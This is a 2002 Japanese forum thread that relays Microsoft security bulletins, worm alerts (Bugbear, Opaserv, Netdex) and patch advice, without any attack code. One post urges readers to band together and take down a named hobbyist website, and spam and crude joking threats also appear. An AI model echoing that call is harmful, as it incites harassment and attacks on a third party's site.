タスクトレイアイコンを消したいなら
「コンソールを開始しない」にしただけでは駄目。
「Java アイコンをシステムトレイに表示」をオフにする必要がある。
やってしもうた…。
591 :
名無しさん@お腹いっぱい。 :02/09/20 21:04 ID:vndHca8U
米MicrosoftのJavaセキュリティーホール修正は不十分と発見者が指摘
http://www.watch.impress.co.jp/internet/www/article/2002/0920/msjava.htm > Microsoftが19日に発表した修正パッチの説明によれば、この修正パッチでは
> Javaデータベース接続(JDBC)クラスに関連して3つのセキュリティーホールが
> 存在することを認め、これを修正した。しかしOnline SolutionsがもともとMicrosoftの
> JavaVMに存在するとしたセキュリティーホールは10以上で、いずれもMicrosoftに
> 報告されていると説明している。しかもMicrosoftが修正していないこれら
> セキュリティーホールの中には、任意のコードが実行できるものなど深刻なバグが
> 含まれており、かなりの危険性があるという。
592 :
名無しさん@お腹いっぱい。 :02/09/20 21:50 ID:gA/keD98
怒涛のバグラッシュだな
>>591 情報どうも。
やはりそんなことだろうと思ってました、、、。
>>587 Javaアイコンをタスクトレイ表示するのをやめ、コンソールを開始しないに
設定したら、だいぶ起動が速くなりました。
MSのに比べれば、そりゃまあ確かに少し時間かかりますが。
ちなみにタブブラウザ(Sleipnir)では
>>588-589 の通り、だめなようですね。
AQEG6BB AQGM2B4
保全
596 :
名無しさん@お腹いっぱい。 :02/09/24 23:05 ID:MLtStLvJ
あげ
>>597 どうもです。では、私の情報源をいくつか。主にメーリングリスト系を。
・MSのメーリングリスト
・BugTraq-JP
・セキュリティmemo
・port139
・VulnWatch
・Scan Tech Report (有料)
・トレンドマイクロ ウイルス情報
・NetSecurity (
http://www.netsecurity.ne.jp/ )
あと、同僚にその筋の情報に詳しい人間がいるので、
本家BugTraqやSecuriTeamのMLからの情報収集は、そいつに頼ってます。
599 :
名無しさん@お腹いっぱい。 :02/09/25 13:31 ID:u0noJaqw
質問させて下さい!! W2K Server + Apache + Tomcat の構成でインターネットからの接続が可能な Webサーバを立てているのですが、 マイクロソフトから出ている、IEのセキュリティパッチは 当てた方が良いのでしょうか?IISは当然動いていません。 後、IEのバージョンもW2Kの初期バージョンです。 IEのバージョンも上げた方が良いのでしょうか? 他のセキュリティパッチは当然当てています。 宜しくお願い致します。
600 :
名無しさん@お腹いっぱい。 :02/09/25 13:49 ID:uOjty0Hj
>>599 とりあえずW2KSP3を今の環境の上からでいいからあてろ
603 :
. :02/09/25 15:03 ID:sthjvfPu
日本テレビの番組サイトに侵入書き換える dailynews.yahoo.co.jp/fc/computer/security_and_encryption/ HPって簡単に書き換えられるの?
604 :
yahooo!!アダルト :02/09/25 15:05 ID:7D9aZjVp
605 :
95なの :02/09/25 16:51 ID:A+LBZEYg
もらったPCが、とうとう立ち上がらなくなりました。 95なので、クラスタスキャンに時間がかかり、いつも途中で強制終了させてネットをやってました。 その強制終了も出来なくなり、ゲートウエイでよく分かんないし、直せる当てもないのです。 廃棄にするしかないと思いますが、お気に入りに入っているものを、どうやって消したら良いんでしょうか? IDとかパスワードもあるんです。
>>605 HDDを物理的に破壊。
コナゴナにしろ。
>>605 燃やしちゃえ、家ごと。
色々諸々みんなまとめて消せるから。
ウイルス駆除ソフト大手サイトで個人情報を誤表示 コンピューターウイルス駆除ソフト「ウイルスバスター」などで知られる トレンドマイクロ(東京都)のインターネットサイトで、利用者がユーザー 登録を更新する際、他人の名前やメールアドレスなど少なくとも10人分の 個人情報が誤まって表示されていたことが25日、わかった。 誤表示されたのは本人確認用の情報で、同社はユーザー登録更新手続きのた め、このサイトを8月28日に開設したが、同社の説明によると、今回のト ラブルは、更新手続きのアクセスが集中したためシステムが正常に稼働しな かったのが原因とみられる。 利用者から「他人の情報が出ている」と指摘があった今月4日、サイトを閉 鎖したが、この間、サイトにアクセスした利用者は約2万3000人に上る という。 (9月26日00:38ヨミウリ) ------------- げんいんは、ういるすによるものとおもわれる。
>>605 ハードディスクをBios画面からLowレベルフォーマットかけてみれば?
MS02-053: Smart HTML インタープリタでバッファオーバーランに
よりコードが実行される (Q324096)のパッチがりりーすされました。
Microsoft FrontPage Server Extensions 2000
Microsoft FrontPage Server Extensions 2002
Microsoft Windows 2000 (FrontPage Server Extensions 2000 を含みます)
Microsoft Windows XP Professional Edition
(FrontPage Server Extensions 2000 を含みます)
Smart HTML インタープリタの脆弱性により、
サービス拒否攻撃を行われる可能性がありるそうです。
http://www.microsoft.com/japan/technet/security/bulletin/MS02- 053ov.asp?frame=true
>>614 壊れません。ただ長い時間やると火ぃ吹いてレンジの内装傷む鴨。
壊れはしないが派手な火花が
618 :
605 :02/09/27 11:07 ID:mHoiv/qj
皆さん有り難うございます。
95で満足できる消防なので、教えていただきたいのですが、
やはり、直る見込みは無いのですよね・・・。
>>611 さんのやり方が良く分かんないので(PCウブなので)、
週末にでも量販店で状況他聞いてきます。
それから、HDDって買い替えができるものですか???
2000とか入れられるのでしょうか?????
CドライブやHDD壊したら、残り物はそれぞれ部品としてしか使えないのでしょうか?
・・・・スレ違いですよね・・・・すいません。量販店炒ってきます。
量販店でLowレベルフォーマットのやり方聞くって、店員ひっくり返るぞ。
620 :
605 :02/09/27 13:01 ID:RCO6eazJ
>>619 さん
どうして???禁じ手なのですか????
量販店にとって、都合が悪いのですか?
>>620 量販店の店員が知ってるとは思えん。
奴らは只のセールスマンだから。
>>620 量販店の人間なんて大して知識ないでしょ。
それに、BIOSなんてマザーボードによって結構違うんだから聞かれても困る。
あと、HDDは交換できるし、OSも入れ替えられる。
623 :
605 :02/09/27 14:07 ID:mHoiv/qj
ふ〜ん。PCに強い人は、店員になるより他の仕事に就くってことか・・・
>>622 さん有り難う!HDD、OSを買い揃えることで決定!!! o(^-^)o
HDDは何とかして破壊します!ガスコンロであぶるってダメかなあ?
>>623 >
>>622 さん有り難う!HDD、OSを買い揃えることで決定!!! o(^-^)o
> HDDは何とかして破壊します!ガスコンロであぶるってダメかなあ?
いやだからさ、外してそのまま自分で持ってればいいじゃん。
HDD自体をばらして中見てみるとか。
625 :
605 :02/09/27 15:02 ID:P/pTZKa5
活用できなくなったHDDはもうゴミでしょ?ゴミは捨てたいのですが・・。 >HDD自体をばらして中見てみるとか。 !!☆◎●□Ωζ§♪!!!????????? ・・・どう言うことかが分かりましぇん・・。 やはり、もっと勉強して出直してきます。(-_-;)
>>625 秘密がバレるのが嫌なら保管しとくのが良いかなと。
> >HDD自体をばらして中見てみるとか。
> !!☆◎●□Ωζ§♪!!!????????? ・・・どう言うことかが分かりましぇん・・。
> やはり、もっと勉強して出直してきます。(-_-;)
文字通りドライブを分解して中の構造を見てみることですが。
ハードディスクの中身がどうなってるか興味ない?
PCの中いじるのが嫌なら、SCSI外付にしても良いかもね。
ボード買わなきゃいけないけど。
>>626 どのみち開けてカード挿さなきゃいけないか・・・
漏れ4機くらいHDの中身を見たことあるなあ…
スレ違いも甚だしい
(・3・) アレなんか急にダメスレになってない?
いいことなんだけど、ネタが無くてさぁ・・・
パッチ当てたいよ症候群
>>633 家のマシン、Win2kSP3を当てると起動しなくなるんだよ (つД`)
638 :
名無しさん@お腹いっぱい。 :02/09/27 22:57 ID:H5odsm4z
639 :
597 :02/09/28 18:35 ID:???
>>598 なるほど、完璧ですね。セキュリティ系のMLは入って
なかったんで1つぐらい入ってみようかな。
>>636 これって今までにIISやFPSE入れてなきゃ問題ないってことで
いいんですよね?
木曜から土曜までここに来れなかった間にMS02-053がリリースされましたね。
>>612 の通りです。これは危険度「高」なので、特に2000/XP Proの人は速攻で
インストールを。
あとは
>>638 の情報ぐらいかな。セキュリティ関連ではRC5-64の解読あたりも
ニュースかも。
641 :
むむむ ◆MUMUMU4w :02/09/29 03:52 ID:GSduBvxC
「Windows 2000/XP」のPPTPにバッファーオーバーフローの脆弱性〜独企業が警告
http://www.watch.impress.co.jp/internet/www/article/2002/0930/pptp.htm >ハッカーがこの脆弱性を悪用し、細工を施したPPTPパケットを送って、
>サーバーのカーネルのメモリーを書き換えることが可能になるという。
>Phionは、このような攻撃によって、Windows 2000 SP3とWindows XPを
>搭載したマシンが機能停止に陥ることを確認したとしている。
さらに、PPTPサービスでは、あらゆるインターフェイスで1723番の
ポートを常にチェックしているため、クライアント側も脆弱性になり、
特にPPTPを使って接続しているDSLユーザーは危険性が高いと警告している。
(・3・) ガクガク ブルブル
643 :
むむむ ◆MUMUMU4w :02/09/30 22:32 ID:l3g3eeIY
>>642 どうもです。
>>638 の詳報ですね。今日いくつかのソースで出てました。
対策が必要な雰囲気ですね。
644 :
名無しさん@お腹いっぱい。 :02/10/01 00:56 ID:IPOJuHlh
645 :
名無しさん@お腹いっぱい。 :02/10/01 15:07 ID:RSw9PLMt
パスワードなどを盗む新型ワーム「Bugbear」
> Bugbearはトロイの木馬付きのインターネットワームで、
> パスワードやクレジ> ットカード情報を盗もうとする。
> 50,688バイトの添付ファイル付き電子メール(サブジェクト
> は既存の電子メールから取ってくる場合がある)、もしくは
> ネットワークファイル共有を介して届く。不正MIMEヘッダの
> 問題を解消するパッチ(MS01-020)を適用していないInternet Explorer 5.0
> 1/5.5を利用するユーザーに感染のおそれがある。IE 6のユーザーは
> 安全。このワームのファイル共有ネットワーク経由での
> 感染能力に対しては、Windowsの全バージョンが脆弱。
http://www.zdnet.co.jp/news/0210/01/nebt_16.html 今日、突然ノートンが更新されてたのはこれだったのか。
>>644 WINDOWSディレクトリ内にshtml.dllってファイルある?
なければ大丈夫だと思うんだが。オレはそのパッチはパスした。
なんでも入れれば良いってもんじゃないしね。システム不安定
になるかもしれんし。
ただ鯖立てて無くてもWin2kSP2だったら入ってると思うから、パッチ当てといた
方がいいんじゃない。
646 :
645 :02/10/01 15:20 ID:RSw9PLMt
648 :
名無しさん@お腹いっぱい。 :02/10/01 19:16 ID:YF3z8zZr
649 :
名無しさん@お腹いっぱい。 :02/10/02 09:01 ID:hXM1aFqN
650 :
@ :02/10/02 12:58 ID:27spK1MR
■■ 出会いサイト開業システムレンタル ■■
儲かる出会い系ビジネス
月収100万円オーバー!!
HP作成できない初心者でも安心して運営
出会いサイトシステムをサーバーごとレンタルします
運営者様には無料で宣伝ソフトもお付けします
http://pink7.net/open/linkstaff.html @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@
>>649 一瞬、「ヘルプとサポート センター」に脆弱性が発見されたのかと思ったです(w。
652 :
;lk :02/10/02 15:58 ID:27spK1MR
653 :
むむむ ◆MUMUMU4w :02/10/02 19:19 ID:TSsbFJdl
■ポート137へのスキャンが急増
アイ・ディフェンス・ジャパンからの情報によると、2002年9月28日以来、TCP/UDP
ポート137のスキャン数が増加し続けている。Internet Storm Centerからの情報に
よると、68,725もの個別ホストから284,693ターゲットがスキャンされたという。これは、
同ポートで通常見られるスキャン数をはるかに上回るものだ。ポート137はNetBIOS
通信として知られており、Windowsはこのポートを使って接続されている
各コンピューターのWindows名を取得している。送信されたパケットは、報告によると
偽造されたnetbiosネームサービス(ns)ルックアップだという。
(以下略)
(以上、2002年10月2日のYahoo!ニュースより一部引用―全文は引用元を参照)
引用元:
http://headlines.yahoo.co.jp/hl?a=20021002-00000012-vgb-sci
654 :
名無しさん@お腹いっぱい。 :02/10/02 20:18 ID:x/M1lCL+
>>653 それ何回もあって、うざがってたんですが、そうだったのですか。犯人が分かったら掲載お願いしますね。
655 :
むむむ ◆MUMUMU4w :02/10/03 03:04 ID:qMy102aP
656 :
むむむ ◆dFMUMUMU4w :02/10/03 11:17 ID:nqkgKhGB
今朝、いきなりWindowsupdateにこんなのが掲載されてた。
元ネタはこれらしい。
Windows XP Documentation Update Can Help You Understand
How to Make Your Computer More Secure
http://support.microsoft.com/default.aspx?scid=KB;EN-US;Q327405& (英語)
--- cut ---
Q327405 : 推奨される更新 (Windows XP Professional)
この更新は、セキュリティとプライバシーに関する新しい情報です。今すぐダウン
ロードして、個人情報を保護するための手順と、コンピュータのセキュリティをより
高める方法について確認してください。
この問題の詳細については、Microsoft Knowledge Base の Q327405 を参照して
ください。なお、このページの情報は英語で説明されています。
必要システム
この更新は、Service Pack 1 (以下 SP1) を適用した Windows XP Professional に
対して適用されます。
実行するには
コンピュータを再起動してインストールを完了します。次に、[スタート] メニューの
[ヘルプとサポート] をクリックして、[ヘルプ トピックを選びます] の [セキュリティと
プライバシー] をクリックします。
657 :
むむむ ◆dFMUMUMU4w :02/10/03 11:26 ID:nqkgKhGB
もう一つあった。こっちは「重要な更新」。 Technetには情報がないように見える、、、。 --- cut --- Q323255 : セキュリティ問題の修正プログラム この修正プログラムによって、Windows XP に存在する「HTML ヘルプの未チェックの バッファによりコードが実行される可能性がある」という脆弱性が修正されます。 今すぐダウンロードして、お使いのコンピュータ上で悪意のあるユーザーが不正な プログラムを実行できないようにしてください。 この脆弱性の詳細については、関連する Technet セキュリティ センターの情報を 参照してください。 必要システム この修正プログラムは、Windows XP に対して適用されます。 実行するには コンピュータを再起動してインストールを完了します。
658 :
むむむ ◆dFMUMUMU4w :02/10/03 12:49 ID:MPrKKq3A
■Win98(Plus!)/Me/XPのシステムにバッファオーバーフローのセキュリティホール
(
>>656 >>657 とは別)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-054ov.asp MS02-054 に関する情報
「MS02-054: ファイル展開機能に含まれる未チェックのバッファにより、
コードが実行される (Q323284)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーによりお客様のコンピューター上で任意のプログラムを
実行される可能性があります。
対象となる製品
==============
・ Microsoft Windows 98
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows 98 Second Edition
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows Millennium Edition
・ Microsoft Windows XP
(続く)
659 :
むむむ ◆dFMUMUMU4w :02/10/03 12:50 ID:MPrKKq3A
660 :
むむむ ◆dFMUMUMU4w :02/10/03 13:13 ID:MPrKKq3A
>>657 情報出ました。
■Windows98/Me/NT4/2000/XPのヘルプ機能にセキュリティホール(MS02-055)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-055ov.asp MS02-055 に関する情報
「MS02-055: Windows ヘルプ機能の未チェックのバッファにより、
コードが実行される (Q323255)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、HTML Help ActiceX コントロールに含まれる未チェックの
バッファにより、不正なプログラムが実行される可能性がある問題です。
最悪の場合、悪意のあるユーザーにお客様のコンピューター上で任意の
プログラムが実行される可能性があります。
対象となる製品
===============
・ Microsoft Windows 98
・ Microsoft Windows 98 Second Edition
・ Microsoft Windows Millennium Edition
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP
(続く)
661 :
むむむ ◆dFMUMUMU4w :02/10/03 13:13 ID:MPrKKq3A
662 :
むむむ ◆dFMUMUMU4w :02/10/03 13:15 ID:MPrKKq3A
■Microsoft SQL Serverに新たに4つの脆弱性(MS02-056)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-056ov.asp MS02-056 に関する情報
「MS02-056: SQL Server 用の累積的な修正プログラム (Q316333)」に関する
要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この修正プログラムは、以下の製品に影響を及ぼすセキュリティ上の問題を
排除する累積的な修正プログラムです。
さらに、新たに確認された 4 つの脆弱性を排除します。
対象となる製品
==============
・ Microsoft SQL Server 7.0
・ Microsoft Desktop Engine (MSDE) 1.0
・ Microsoft SQL Server 2000
・ Microsoft Desktop Engine (MSDE) 2000
(続く)
663 :
むむむ ◆dFMUMUMU4w :02/10/03 13:16 ID:MPrKKq3A
664 :
;lk :02/10/03 15:27 ID:jDpVxv8P
665 :
むむむ ◆dFMUMUMU4w :02/10/04 00:14 ID:jF/l+QNF
■
>>658-659 と同じセキュリティホールが他のソフトウェアにも存在
http://www.rapid7.com/advisories/R7-0004.txt によると、上記
>>658-659 と
同種のセキュリティホールが、以下のソフトウェアにも存在する模様。
KNOWN VULNERABLE:
o Lotus Notes R4
o Lotus Notes R5
o Lotus Notes R6 (pre-gold)
o Verity, Inc. KeyView viewing SDK
o Aladdin Systems Stuffit Expander (pre 7.0)
これらは問題ない模様。
Apparently NOT VULNERABLE:
o WinRAR is believed to be NOT vulnerable
o WinZip 8.x is believed to be NOT vulnerable
o zlib is believed to be NOT vulnerable
666 :
むむむ ◆dFMUMUMU4w :02/10/04 03:27 ID:jF/l+QNF
■ネットワーク共有でバグベア上回る感染速度 オパサーブ(毎日DIGITAL TODAY)
アンチウイルスソフト各社は、ワーム「Opaserv(オパサーブ)」または「OPASOFT
(オパソフト)」の感染が広がっているとして、警戒を呼びかけている。オパサーブは、
30日に発見されたネットワーク共有で感染を広げるタイプのワームだが、感染の
ペースが速いのが特徴となっている。
シマンテックには3日13時現在で日本国内から41件の被害報告が寄せられている。
また、トレンドマイクロ社には、3日20時15分現在で139件が寄せられている。
いずれも、30日に発見されたワーム「バグベア」の同時点での報告件数を
上回っている。
オパサーブは、ネットワークを検索し、共有されたドライブがあればその上に
自分自身のコピーを作成して、感染を広げる。感染すると、ネットワーク内の
コンピュータ名とドメイン名を特定サイトに送信したり、このサイトからアップデートを
ダウンロードしようとする。ワームは、この特定のサイトにアクセスしたユーザー
から広がったとみられるが、サイトは現在閉鎖されている。
(以上、2002年10月4日の毎日インタラクティブより一部引用―全文は引用元を参照)
引用元:
http://www.mainichi.co.jp/digital/network/archive/200210/03/2.html
668 :
むむむ ◆dFMUMUMU4w :02/10/04 13:27 ID:hdqqM6Ym
■Services for Unix 3.0のSunRPC由来のコードにセキュリティホール(MS02-057)
MS02-057 に関する情報
「MS02-057: Services for Unix 3.0 に含まれる Interix SDK の問題によりコードが
実行される (Q329209)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
この問題は、Services for UNIX (SFU) 3.0 の Interix SDK に含まれる Sun RPC
Library に関する 3 つの脆弱性により、不正なプログラムが実行される可能性が
あります。最悪の場合、悪意のあるユーザーによりお客様のコンピュータ上で任意の
プログラムを実行される可能性があります。
対象となる製品
Microsoft Windows NT 4.0
Microsoft Windows 2000
Microsoft Windows XP
注意: Services for UNIX (SFU) 3.0 (英語版製品のみが提供されております。
そのため、日本語版修正プログラムはございません) の Sun RPC Library を含む
Interix SDK をインストールした環境、または、Interix SDK を利用して作成された
アプリケーションがインストールされているコンピュータは、修正プログラムを適用
してください。
現在ダウンロードできる日本語ベータ版 Services for UNIX 3.0 および、リリースを
予定の日本語版 Services for UNIX 3.0 では、この問題が修正されております。
修正プログラム
Microsoft Services for Unix 3.0
http://download.microsoft.com/download/winntunx/Patch/3.0/NT45XP/EN-US/q329209_sfu_3_x86_en.exe
669 :
名無しさん@お腹いっぱい。 :02/10/04 14:21 ID:boAK7hdU
国際電話の請求って、NTTの電話料金と一緒にくるの? それとも別に請求書が送られてくるの?
>669 初心者板に逝け。
672 :
名無しさん@お腹いっぱい。 :02/10/07 10:18 ID:4marOLHU
ge
ウィルス頑張れ。
ウィルスなんぞ応援する椰子はな、アタマぶっつぶされても
文句言えねえんだよ。わかってんのか。ああ?
∧ ∧ ∧
/ ヽ / ヽ_ / .∧
/ `、___/ `、⌒ヾ⌒ヽ/ ∧
/ / (.....ノ(....ノ / ヽ
.l::::ノ( | ι ι::(....ノノ
|:::::⌒ -=・=- / ̄ ̄ヽ ::::::::::::::/`ヽ
.|::::::::::::::::: \_(___..ノ :::::::::::::::::::(....ノノ
>>673 ヽ::::::::::::::::::: \/ヽ ι ::::::::::::::::::::::::::ノ
は、はい・・・ぃ・・・
∧ ∧
/ `、___/ 、⌒ヾ⌒ヽ
/ \ ( (.....ノ(....ノ / ヽ
l::::::::: | 丿 丿(....ノノ
|:::::U::::: < ・> <・/ ̄ ̄ヽ /`ヽ
.|::::::::::::::::: \__/ .(___ノ 彡 (....ノノ
ヽ::::::::::::U::::::: \/ 人 サッ :ノ
アレ、?
∧
/ ̄ ̄ ̄ ̄ヽ / ヽ 、⌒ヾ⌒\
/ / ̄\ / `、(.....ノ(....ノ \
/ / \ ヽ/ u / ヽ
| / (・) l::::::::: u .:(....ノノ ニギニギ…
| | / ̄ ̄ヽ:::< ・> < ・> ./`ヽ <イエそんなつもりじゃ、、、
| | __(___..ノ::: \__/ u (....ノノ
>>674 | | \__ヽ::::::::::::U::::::: \/ ノ
ゝ‐イ\. ・ /ノ
おい、テメーコノスレはセキュリティー情報スレだろなに、
無意味なAA貼ってんだテメー なめんじゃねーぞ
677 :
名無しさん@お腹いっぱい。 :02/10/09 16:44 ID:ZMel/QOm
678 :
名無しさん@お腹いっぱい。 :02/10/09 16:58 ID:WzJq+mFs
最悪な同人サクール
2ちゃんねるを否定する最低の同人サークル
「スタジオた〜」
あろうことか、トップページに
「 2 ち ゃ ん ね ら ー の
入 場 を 禁 止 し ま す 」
とまで書いてる最低のサークル。
おまけに掲示板では
「2ちゃんねらーは頭が悪い気違いばっか」
という暴言まで吐く始末。
もう我慢できません
メインジャンルはデジモン・おジャ魔女
絵が上手いからまたムカツクんだけどナ^
みんなの力でこのサイトに潰しをかけよう!!
ttp://www.d4.dion.ne.jp/~tar_tar/
セキュリティ大切。たかぎひろみつばんざい。
680 :
名無しさん@お腹いっぱい。 :02/10/10 04:27 ID:xmv4TSQg
>>678 ネットウォッチのスレに書き込めばよろし
デジモンって昔流行ったなぁ。1と2しか買っていないが。
681 :
432 :02/10/10 14:53 ID:kRKQgvfu
682 :
名無しさん@お腹いっぱい。 :02/10/10 16:41 ID:LFOoUym8
684 :
むむむ ◆dFMUMUMU4w :02/10/11 11:34 ID:iBYMGi78
>>658 の MS02-054 が更新されたかもしれません。詳細は判明次第ここにでも。
685 :
むむむ ◆dFMUMUMU4w :02/10/11 11:37 ID:iBYMGi78
686 :
むむむ ◆dFMUMUMU4w :02/10/11 11:42 ID:iBYMGi78
>>685 備考
Internet Explorer 6 SP1 に含まれている Outlook Express 6 には、この修正が
含まれてます。
ということで、IE6 SP1の人はこのパッチは当てなくていい模様。
687 :
名無しさん@お腹いっぱい。 :02/10/13 14:01 ID:vkgUnj+h
www.pcworld.com/news/article/0,aid,104940,00.asp これ気になるなあ。
689 :
むむむ ◆dFMUMUMU4w :02/10/15 01:23 ID:JWwpUBF+
690 :
むむむ ◆dFMUMUMU4w :02/10/15 17:21 ID:NaPya116
■MSN Messengerで感染するワーム"Henpeck"
Microsoftのインスタントメッセージングソフト「MSN Messenger」経由で感染する
ワーム「Henpeck」について、ウイルス対策ソフトメーカー各社が10月10日警告を
発した。
HenpeckはMSN Messengerのネットワークを利用して、オンライン上に置かれた
悪質なファイル「BR2002.exe」へのリンクを含んだメッセージを送りつける。この
リンクをクリックするとファイルがダウンロードされ、知らないうちにプログラムが
稼動。友達リストに登録された全員に宛てて、同様のインスタントメッセージを
送りつける。
ウイルス対策ソフトメーカーのTrend MicroはHenpeckについて、「メッセージを
受け取っても自動的にこのワームに感染するわけではない。受け取った側がURLを
クリックするとワームをダウンロードし、システム内部で実行される」との情報を掲載
している。
問題のファイルは現在このURLから外されているため、ワームの感染拡大は
防がれている。ただ、既に感染してしまったコンピュータは“裏口”を作り出す
プログラム「BKDR_EVILBOT.A」がインストールされている可能性があり、ここから
サービス拒否攻撃を仕掛ける拠点とされる恐れもある。
(以上、2002年10月15日のZDNet JAPANより一部引用―全文は引用元を参照)
引用元:
http://www.zdnet.co.jp/news/0210/12/nebt_03.html
691 :
むむむ ◆dFMUMUMU4w :02/10/17 11:11 ID:4Y6ecmit
■Word/Excelにセキュリティホール、データ漏洩の可能性(MS02-059)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-059ov.asp MS02-059 に関する情報
「MS02-059: Word フィールドおよび Excel の外部データ更新の問題により、
情報が漏えいされる (Q330008)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、下記製品のフィールド コードまたは外部データ更新機能により、
意図しない情報が外部に漏えいされる可能性があります。 最悪の場合、重要な
情報の漏えい、または、プライバシーが侵害される可能性があります。
対象となる製品
==============
・Microsoft Word 2002
・Microsoft Word 2000
・Microsoft Word 97
・Microsoft Word 98(日本語版のみ)
・Microsoft Word v.X for Macintosh
・Microsoft Word 2001 for Macintosh
・Microsoft Word 98 for Macintosh
・Microsoft Excel 2002
(続く)
692 :
むむむ ◆dFMUMUMU4w :02/10/17 11:11 ID:4Y6ecmit
693 :
むむむ ◆dFMUMUMU4w :02/10/17 11:12 ID:4Y6ecmit
694 :
むむむ ◆dFMUMUMU4w :02/10/17 11:15 ID:4Y6ecmit
■SQL Serverに管理者権限を奪われる脆弱性(MS02-061)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-061ov.asp MS02-061 に関する情報
「MS02-061: SQL Server Web タスクで権限が昇格する (Q316333)」に関する
要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、下記対象となる製品に含まれる Web タスクに関する
Transact-SQL ストアド プロシージャが悪用されることにより、本来権限の
与えられていないユーザーであるにも関わらず、Web タスクを実行、削除、
挿入、変更が行われる可能性があるものです。最悪の場合、権限の低い
ユーザーを踏み台とし、データベースシステムへの不正なアクセスが
行われることで情報の漏洩や改ざんなどの被害を受ける可能性があります。
対象となる製品
==============
・ Microsoft SQL Server 7.0
・ Microsoft Desktop Engine (MSDE) 1.0
・ Microsoft SQL Server 2000
・ Microsoft Desktop Engine (MSDE) 2000
(続く)
695 :
むむむ ◆dFMUMUMU4w :02/10/17 11:15 ID:4Y6ecmit
696 :
むむむ ◆dFMUMUMU4w :02/10/18 04:43 ID:AsCC66BL
■Webサイトを開くだけでトロイの木馬が送り込まれる「ウィルスサイト」
MS00-075の脆弱性を利用
ロシアのKasperskyは16日、ウィルス作者が開設したWebサイトを訪問するだけで
トロイの木馬を送り込まれ、自分のマシンが自在に操作されてしまう新種のウィルス
「Netdex」を発見したと報告した。幸いにして今のところ実害はほとんど出ていないが、
今後のウィルスに対処するため、危険なWebサイトへどのように誘導されるかを知識
として知り、教訓を得る必要がある。また、公表されているセキュリティーホールに
対応したパッチをすべてインストールするなど早急に対策をとる必要がある。
Netdexは、複数のコンポーネントに分かれた一連のプログラムだ。ウィルス作者が
開設したロシアドメインのWebサイトには、JavaScriptで記述されたスクリプトが組み
込まれており、Internet Explorer4.x/5.xに存在するMicrosoft VMのセキュリティー
ホール(MS00-075)を使って、Webサイトを開くと同時にトロイの木馬をマシンに送り
込む。トロイの木馬はバックドアを開き、1分おきにそのWebサイトからの指令を
受け取り、マシン内部にファイルの作成、削除、コピーを行なう。また、利用者に
成り代わってメールを送信したり、システムメッセージを表示するなど、マシンを
乗っ取ることが可能だ。
(以上、2002年10月18日のInternet Watchより一部引用―全文は引用元を参照)
引用元:
http://www.watch.impress.co.jp/internet/www/article/2002/1017/netdex.htm Kaspersky:
http://www.kaspersky.com/news.html?id=963317
697 :
むむむ ◆dFMUMUMU4w :02/10/18 04:45 ID:AsCC66BL
◆【WPC EXPO 2002速報】
セキュリティ・スタジアム2002でOSのデフォルト設定の怖さを見せつける
2002年10月16日,WPC EXPO 2002内で開催している「セキュリティ・スタジアム
2002」において,セキュリティ競技の成果が公表された。セキュリティ・スタジアム
2002は,セキュリティの怖さと対策の必要性を訴求するためのセキュリティ・イベン
トで,10月16〜19日の4日間,仮想的なセキュリティの競技を繰り広げる。この競技
では,有効な防御策や深刻なセキュリティ・ホールを実地に検証し,その成果を毎日
公表する。2002年10月16日に報告された成果は二つ。
続き(全文)は,
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20021017/7/ でお読みいただけます。
おつかれ。
保守
700 :
0. 3 ◆zwz500/rp. :02/10/20 15:26 ID:vrRqrZXm
700げと
保守
702 :
名無しさん@お腹いっぱい。 :02/10/23 21:38 ID:G17KdQPz
703 :
名無しさん@お腹いっぱい。 :02/10/23 22:25 ID:6rouvIDT
>>むむむ WinXPだけどSP1入れとけば大丈夫みたいだね。
704 :
名無しさん@お腹いっぱい。 :02/10/23 22:45 ID:G17KdQPz
>>702 http://www.watch.impress.co.jp/internet/www/article/2002/1023/iesech.htm > GreyMagicによると、このセキュリティーホールはIE5.5と6.0に存在している。
> それ以前のバージョンでは、IE5の場合「Service Pack 2」(SP2)を
> インストールすることによって9つのセキュリティーホールすべてを塞ぐことができる。
> IE6については、SP1をインストールすることで9つのセキュリティーホールのうち7つを
> 塞ぐことができるが、2つのセキュリティーホールはそれでも塞げない。
> また、IE5.5 SP2とIE6には9つのセキュリティーホール全てが存在しており、
> 何らかの対策が必要である。この場合、Microsoftがパッチを発表するまでの間
> セキュリティーホールを悪用されないために「アクティブスクリプト」を
> オフにすることをGreyMagicでは推奨している。
むむむ?
むむむ!
保護
長期出張?
今はニュー+に傾注してでしょ。
む・・・むぅ・・・・・・むッ・・・・!
>>709 >>710 脆弱性ネタがないか、あってもWindows版じゃないか、
日本ではあまり広まってないソフトなので見送ってるとか、
あるいは単にヴぉけてて情報を見落としてるだけとか(汗。
で、ここに情報がどんどん出てくるのがいいのか悪いのかは議論の余地ありかも(w。
# 何にせよ平常時にはここは1日に1度は見てますです。
713 :
インターネットエクスプロアーやめたらハッカーが減った! :02/10/28 21:28 ID:zaTW6Ahk
インターネットエクスプロアーを使っている間、1分に一回以上は、
ハッカーにおそわれていた。
最近、Mozilla に変えたら、ハッカーにおそわれる回数がとても減った。
Mozilla は次からダウンロードできる。
http://www.mozilla.org/
